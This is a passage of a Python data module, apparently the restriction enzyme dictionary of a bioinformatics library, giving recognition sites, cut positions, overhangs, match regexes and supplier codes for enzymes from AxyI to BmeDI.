'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGG',
'size': 7,
'substrat': 'DNA',
'suppl': ('J',),
}
rest_dict['AxyI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GKGCMC'),
'compsite': '(?=(?P<BaeGI>G[GT]GC[AC]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'KGCM',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKGCMC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BaeGI'] = _temp()
def _temp():
return {
'charac': (-10, -26, 23, 7, 'ACNNNNGTAYC'),
'compsite': '(?=(?P<BaeI>AC....GTA[CT]C))|(?=(?P<BaeI_as>G[AG]TAC....GT))',
'dna': None,
'freq': 8192.0,
'fst3': -26,
'fst5': -10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 23,
'site': 'ACNNNNGTAYC',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BaeI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCCGAG'),
'compsite': '(?=(?P<Bag18758I>CCCGAG))|(?=(?P<Bag18758I_as>CTCGGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bag18758I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGGCCA'),
'compsite': '(?=(?P<BalI>TGGCCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGCCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'Q', 'R', 'X'),
}
rest_dict['BalI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGATCC'),
'compsite': '(?=(?P<BamHI>GGATCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['BamHI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGYRCC'),
'compsite': '(?=(?P<BanI>GG[CT][AG]CC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GYRC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYRCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N', 'R'),
}
rest_dict['BanI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<BanII>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('K', 'N', 'X'),
}
rest_dict['BanII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RTCAGG'),
'compsite': '(?=(?P<BanLI>[AG]TCAGG))|(?=(?P<BanLI_as>CCTGA[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTCAGG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BanLI'] = _temp()
def _temp():
return {
'charac': (-7, -25, 25, 7, 'GAAGNNNNNNTAC'),
'compsite': '(?=(?P<BarI>GAAG......TAC))|(?=(?P<BarI_as>GTA......CTTC))',
'dna': None,
'freq': 16384.0,
'fst3': -25,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 25,
'site': 'GAAGNNNNNNTAC',
'size': 13,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BarI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTTCAG'),
'compsite': '(?=(?P<Bau1417V>GTTCAG))|(?=(?P<Bau1417V_as>CTGAAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bau1417V'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CACGAG'),
'compsite': '(?=(?P<BauI>CACGAG))|(?=(?P<BauI_as>CTCGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'ACGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BauI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGCGAG'),
'compsite': '(?=(?P<Bbr52II>GGCGAG))|(?=(?P<Bbr52II_as>CTCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bbr52II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTRAAYG'),
'compsite': '(?=(?P<Bbr57III>GT[AG]AA[CT]G))|(?=(?P<Bbr57III_as>C[AG]TT[CT]AC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTRAAYG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bbr57III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGGGAG'),
'compsite': '(?=(?P<Bbr7017II>CGGGAG))|(?=(?P<Bbr7017II_as>CTCCCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bbr7017II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGRCAG'),
'compsite': '(?=(?P<Bbr7017III>GG[AG]CAG))|(?=(?P<Bbr7017III_as>CTG[CT]CC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGRCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bbr7017III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<BbrPI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['BbrPI'] = _temp()
def _temp():
return {
'charac': (8, 6, None, None, 'GAAGAC'),
'compsite': '(?=(?P<BbsI>GAAGAC))|(?=(?P<BbsI_as>GTCTTC))',
'dna': None,
'freq': 4096.0,
'fst3': 6,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BbsI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GNAAYG'),
'compsite': '(?=(?P<BbuB31I>G.AA[CT]G))|(?=(?P<BbuB31I_as>C[AG]TT.C))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GNAAYG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BbuB31I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGRKA'),
'compsite': '(?=(?P<BbuB31II>CG[AG][GT]A))|(?=(?P<BbuB31II_as>T[AC][CT]CG))',
'dna': None,
'freq': 256.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRKA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BbuB31II'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GWGCWC'),
'compsite': '(?=(?P<Bbv12I>G[AT]GC[AT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'WGCW',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GWGCWC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bbv12I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTCAGC'),
'compsite': '(?=(?P<BbvCI>CCTCAGC))|(?=(?P<BbvCI_as>GCTGAGG))',
'dna': None,
'freq': 16384.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTCAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BbvCI'] = _temp()
def _temp():
return {
'charac': (13, 12, None, None, 'GCAGC'),
'compsite': '(?=(?P<BbvI>GCAGC))|(?=(?P<BbvI_as>GCTGC))',
'dna': None,
'freq': 1024.0,
'fst3': 12,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BbvI'] = _temp()
def _temp():
return {
'charac': (8, 6, None, None, 'GAAGAC'),
'compsite': '(?=(?P<BbvII>GAAGAC))|(?=(?P<BbvII_as>GTCTTC))',
'dna': None,
'freq': 4096.0,
'fst3': 6,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BbvII'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'CCATC'),
'compsite': '(?=(?P<BccI>CCATC))|(?=(?P<BccI_as>GATGG))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BccI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TAGGAG'),
'compsite': '(?=(?P<Bce3081I>TAGGAG))|(?=(?P<Bce3081I_as>CTCCTA))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TAGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bce3081I'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTTGAG'),
'compsite': '(?=(?P<Bce83I>CTTGAG))|(?=(?P<Bce83I_as>CTCAAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bce83I'] = _temp()
def _temp():
return {
'charac': (17, 14, None, None, 'ACGGC'),
'compsite': '(?=(?P<BceAI>ACGGC))|(?=(?P<BceAI_as>GCCGT))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BceAI'] = _temp()
def _temp():
return {
'charac': (-7, -10, 14, 11, 'GCAGC'),
'compsite': '(?=(?P<BceSIV>GCAGC))|(?=(?P<BceSIV_as>GCTGC))',
'dna': None,
'freq': 1024.0,
'fst3': -10,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': 11,
'scd5': 14,
'site': 'GCAGC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BceSIV'] = _temp()
def _temp():
return {
'charac': (17, 13, None, None, 'ACGGC'),
'compsite': '(?=(?P<BcefI>ACGGC))|(?=(?P<BcefI_as>GCCGT))',
'dna': None,
'freq': 1024.0,
'fst3': 13,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGGC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BcefI'] = _temp()
def _temp():
return {
'charac': (-10, -24, 24, 10, 'CGANNNNNNTGC'),
'compsite': '(?=(?P<BcgI>CGA......TGC))|(?=(?P<BcgI_as>GCA......TCG))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 10,
'scd5': 24,
'site': 'CGANNNNNNTGC',
'size': 12,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BcgI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCWGG'),
'compsite': '(?=(?P<BciT130I>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'W',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['BciT130I'] = _temp()
def _temp():
return {
'charac': (12, 5, None, None, 'GTATCC'),
'compsite': '(?=(?P<BciVI>GTATCC))|(?=(?P<BciVI_as>GGATAC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 12,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BciVI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGATCA'),
'compsite': '(?=(?P<BclI>TGATCA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGATCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'J', 'M', 'N', 'O', 'R', 'S'),
}
rest_dict['BclI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCSGG'),
'compsite': '(?=(?P<BcnI>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['BcnI'] = _temp()
def _temp():
return {
'charac': (6, 5, None, None, 'GTCTC'),
'compsite': '(?=(?P<BcoDI>GTCTC))|(?=(?P<BcoDI_as>GAGAC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BcoDI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACTAGT'),
'compsite': '(?=(?P<BcuI>ACTAGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTAGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BcuI'] = _temp()
def _temp():
return {
'charac': (-10, -24, 24, 10, 'TGANNNNNNTCA'),
'compsite': '(?=(?P<BdaI>TGA......TCA))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 10,
'scd5': 24,
'site': 'TGANNNNNNTCA',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BdaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'WCCGGW'),
'compsite': '(?=(?P<BetI>[AT]CCGG[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WCCGGW',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BetI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<BfaI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BfaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GANGGAG'),
'compsite': '(?=(?P<BfaSII>GA.GGAG))|(?=(?P<BfaSII_as>CTCC.TC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GANGGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BfaSII'] = _temp()
def _temp():
return {
'charac': (11, 4, None, None, 'ACTGGG'),
'compsite': '(?=(?P<BfiI>ACTGGG))|(?=(?P<BfiI_as>CCCAGT))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGGG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BfiI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTRYAG'),
'compsite': '(?=(?P<BfmI>CT[AG][CT]AG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TRYA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTRYAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BfmI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RGCGCY'),
'compsite': '(?=(?P<BfoI>[AG]GCGC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCGCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BfoI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTTAAG'),
'compsite': '(?=(?P<BfrI>CTTAAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TTAA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'S'),
}
rest_dict['BfrI'] = _temp()
def _temp():
return {
'charac': (10, 8, None, None, 'ACCTGC'),
'compsite': '(?=(?P<BfuAI>ACCTGC))|(?=(?P<BfuAI_as>GCAGGT))',
'dna': None,
'freq': 4096.0,
'fst3': 8,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCTGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BfuAI'] = _temp()
def _temp():
return {
'charac': (12, 5, None, None, 'GTATCC'),
'compsite': '(?=(?P<BfuI>GTATCC))|(?=(?P<BfuI_as>GGATAC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 12,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BfuI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTRAAG'),
'compsite': '(?=(?P<Bga514I>GT[AG]AAG))|(?=(?P<Bga514I_as>CTT[CT]AC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTRAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bga514I'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GCCNNNNNGGC'),
'compsite': '(?=(?P<BglI>GCC.....GGC))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCNNNNNGGC',
'size': 11,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'N', 'O', 'Q', 'R', 'V', 'X'),
}
rest_dict['BglI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'AGATCT'),
'compsite': '(?=(?P<BglII>AGATCT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGATCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['BglII'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GGATC'),
'compsite': '(?=(?P<BinI>GGATC))|(?=(?P<BinI_as>GATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BinI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCNGC'),
'compsite': '(?=(?P<BisI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BisI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RTTAAATM'),
'compsite': '(?=(?P<BkrAM31DI>[AG]TTAAAT[AC]))|(?=(?P<BkrAM31DI_as>[GT]ATTTAA[CT]))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTTAAATM',
'size': 8,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BkrAM31DI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRAGCAG'),
'compsite': '(?=(?P<Ble402II>G[AG]AGCAG))|(?=(?P<Ble402II_as>CTGCT[CT]C))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRAGCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ble402II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCTAGG'),
'compsite': '(?=(?P<BlnI>CCTAGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTAGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('K', 'M', 'S'),
}
rest_dict['BlnI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAGGAC'),
'compsite': '(?=(?P<BloAII>GAGGAC))|(?=(?P<BloAII_as>GTCCTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BloAII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCTNAGC'),
'compsite': '(?=(?P<BlpI>GCT.AGC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BlpI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCNGC'),
'compsite': '(?=(?P<BlsI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BlsI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGTACT'),
'compsite': '(?=(?P<BmcAI>AGTACT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGTACT',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BmcAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCNGG'),
'compsite': '(?=(?P<Bme1390I>CC.GG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bme1390I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGWCC'),
'compsite': '(?=(?P<Bme18I>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bme18I'] = _temp()
def _temp():
return {
'charac': (3, 0, None, None, 'C'),
'compsite': '(?=(?P<BmeDI>C))|(?=(?P<BmeDI_as>G))',
'dna': None,
'freq': 4.0,
'fst3': 0,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
